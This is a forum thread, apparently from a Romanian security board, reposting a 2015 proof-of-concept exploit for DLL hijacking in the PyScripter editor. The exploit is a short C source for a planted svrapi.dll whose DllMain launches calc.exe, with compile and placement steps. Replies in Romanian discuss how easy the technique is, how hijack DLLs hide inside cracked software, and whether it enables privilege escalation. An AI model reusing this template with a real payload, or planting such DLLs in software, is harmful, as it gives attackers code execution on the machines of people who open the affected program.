Jump to content
Aerosol

PyScripter DLL Hijacking

Recommended Posts

/*
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: PyScriper DLL Hijacking
#[+] Date: 05-04-2015
#[+] Type: Local Exploits
#[+] Vendor: https://code.google.com/p/pyscripter/
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] gcc -shared -o svrapi.dll dllhijack.c
then put svrapi.dll and create a .py file in the same dir, open the .py file , calc.exe execute.
Proof of Concept (PoC):
=======================
*/

#include <windows.h>

int tunisian()
{
WinExec("calc", 0);
exit(0);
return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
tunisian();
return 0;
}

Source

Link to comment
Share on other sites

Nu are voie sa fie asa de usor...

Din pacate este foarte usor :) DLL Hijacking si foarte multe programe au problema asta, mai ales cand instalezi programe crackuite si iti ofera in crackul programului respectiv exe si .dll date este pericolul mare.

In .dll poti ascunde ce vrei tu. :)

  • Upvote 1
Link to comment
Share on other sites

Ideea era sa faci privilege escalation/bypass UAC. Unde e folder-ul aplicatiei asteia, Program Files sau AppData? Daca e in Program Files, cacat, nu ai drept de scriere acolo ca "normal user".

Apoi, aplicatia ruleaza ca Admin? Chiar daca trebuie pornita manual (adica nu la startup) si chiar daca apare promt-ul UAC, acesta o sa fie legitim, dar daca nu, exploit-urile lui "tunis-pula" sunt niste cacaturi inutile.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...